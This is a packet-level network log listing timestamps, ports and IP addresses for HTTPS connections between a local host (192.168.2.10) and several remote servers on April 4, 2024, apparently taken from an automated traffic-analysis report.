Apr 4, 2024 17:49:23.626641989 CEST	443	49774	162.159.133.233	192.168.2.10
Apr 4, 2024 17:49:23.626740932 CEST	49774	443	192.168.2.10	162.159.133.233
Apr 4, 2024 17:49:24.193933964 CEST	443	49773	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:24.194006920 CEST	49773	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:24.194021940 CEST	443	49773	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:24.194034100 CEST	443	49773	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:24.194061041 CEST	49773	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:24.194093943 CEST	49773	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:24.212776899 CEST	49773	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:24.212800980 CEST	443	49773	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:24.417979956 CEST	49775	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:24.418028116 CEST	443	49775	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:24.418097019 CEST	49775	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:24.418420076 CEST	49775	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:24.418431044 CEST	443	49775	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:24.955538034 CEST	443	49775	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:24.955625057 CEST	49775	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:24.957365990 CEST	49775	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:24.957377911 CEST	443	49775	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:24.959196091 CEST	49775	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:24.959203005 CEST	443	49775	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:25.750665903 CEST	443	49771	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:25.750792980 CEST	443	49771	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:25.750849009 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:25.769696951 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:25.769735098 CEST	443	49771	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:25.778702021 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:25.778759003 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:25.778861046 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:25.779057980 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:25.779071093 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:25.898853064 CEST	443	49775	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:25.898926020 CEST	443	49775	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:25.899000883 CEST	49775	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:25.904068947 CEST	49775	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:25.904088974 CEST	443	49775	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:26.026348114 CEST	49777	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:26.026407003 CEST	443	49777	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:26.026523113 CEST	49777	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:26.046014071 CEST	49777	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:26.046052933 CEST	443	49777	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:26.147814989 CEST	49774	443	192.168.2.10	162.159.133.233
Apr 4, 2024 17:49:26.309448004 CEST	443	49777	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:26.309557915 CEST	49777	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:26.317147970 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:26.318063974 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:26.342184067 CEST	49777	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:26.342221975 CEST	443	49777	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:26.342566967 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:26.342578888 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:26.342580080 CEST	443	49777	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:26.342636108 CEST	49777	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:26.344749928 CEST	49777	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:26.348361969 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:26.348371029 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:26.392235041 CEST	443	49777	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:26.928329945 CEST	443	49777	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:26.928400040 CEST	49777	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:26.928467989 CEST	443	49777	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:26.928494930 CEST	443	49777	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:26.928529024 CEST	49777	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:26.928560019 CEST	49777	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:26.961005926 CEST	49777	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:26.961054087 CEST	443	49777	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:27.165843010 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.165872097 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.165888071 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.165901899 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.165925026 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.165946960 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.165952921 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.165966988 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.165981054 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.166013002 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.287412882 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.287441969 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.287506104 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.287519932 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.287554979 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.287554979 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.470381975 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.470434904 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.470498085 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.470515966 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.470626116 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.470626116 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.581370115 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.581403971 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.581446886 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.581464052 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.581496000 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.581505060 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.677453995 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.677479982 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.677553892 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.677570105 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.677609921 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.677609921 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.747728109 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.747752905 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.749957085 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.749957085 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.749980927 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.751260042 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.802330971 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.802356005 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.802433014 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.802433014 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.802469015 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.805953979 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.852845907 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.852880001 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.853005886 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.853005886 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.853020906 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.853255033 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.903999090 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.904025078 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.905345917 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.905345917 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.905364037 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.905706882 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.948966026 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.948997974 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.950639963 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.950654984 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.950813055 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.996371984 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.996402025 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.996490955 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.996490955 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:27.996510029 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:27.997983932 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.025413990 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.025440931 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.025537968 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.025537968 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.025563002 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.026070118 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.054481030 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.054507971 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.054677963 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.054677963 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.054689884 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.055428982 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.082998991 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.083026886 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.083127022 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.083153009 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.083796978 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.083796978 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.107954979 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.107990026 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.108098030 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.108119011 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.108263969 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.108305931 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.132553101 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.132580042 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.132849932 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.132858038 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.133244038 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.154640913 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.154668093 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.154784918 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.154784918 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.154793024 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.155086994 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.174693108 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.174710035 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.175021887 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.175045013 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.175548077 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.193886042 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.193914890 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.194047928 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.194047928 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.194066048 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.194190979 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.215524912 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.215553999 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.215706110 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.215706110 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.215723038 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.218230963 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.233131886 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.233151913 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.233355045 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.233370066 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.233544111 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.253067970 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.253097057 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.253206015 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.253206015 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.253225088 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.253307104 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.269288063 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.269316912 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.269732952 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.269733906 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.269759893 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.273575068 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.286273003 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.286308050 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.289450884 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.289450884 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.289474964 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.292431116 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.303921938 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.303953886 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.304122925 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.304122925 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.304133892 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.304358959 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.318217993 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.318249941 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.318444014 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.318444014 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.318469048 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.319019079 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.332449913 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.332477093 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.332560062 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.332560062 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.332592964 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.332879066 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.346992016 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.347033024 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.347115040 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.347136021 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.347162962 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.347582102 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.362030983 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.362051010 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.362190962 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.362190962 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.362210035 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.362761974 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.374516010 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.374538898 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.374660969 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.374674082 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.374784946 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.388129950 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.388155937 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.388286114 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.388286114 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.388315916 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.388778925 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.400525093 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.400546074 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.401958942 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.401973009 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.402470112 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.411531925 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.411549091 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.411617041 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.411617041 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.411650896 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.412084103 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.423820019 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.423842907 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.424853086 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.424853086 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.424877882 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.425390005 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.434144974 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.434165001 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.434269905 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.434331894 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.434353113 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.434420109 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.444895983 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.444920063 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.446001053 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.446016073 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.446469069 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.454682112 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.454706907 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.454791069 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.454791069 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.454798937 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.458082914 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.465802908 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.465825081 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.466742039 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.466753006 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.471234083 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.474839926 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.474869013 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.474946976 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.474946976 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.474955082 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.476258039 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.484505892 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.484534979 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.484764099 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.484764099 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.484774113 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.486140966 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.494626999 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.494643927 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.495012999 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.495024920 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.495131016 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.501498938 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.501614094 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.501835108 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.501835108 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.506051064 CEST	49776	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.506077051 CEST	443	49776	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.898829937 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.898885012 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:28.898955107 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.899210930 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:28.899223089 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:29.425612926 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:29.425685883 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:29.458966017 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:29.458976984 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:29.459182024 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:29.459187984 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.253660917 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.253693104 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.253709078 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.253760099 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:30.253798008 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:30.253808975 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.253863096 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:30.369746923 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.369777918 CEST	443	49780	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:30.369908094 CEST	49780	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:30.369925976 CEST	443	49780	95.216.179.73	192.168.2.10
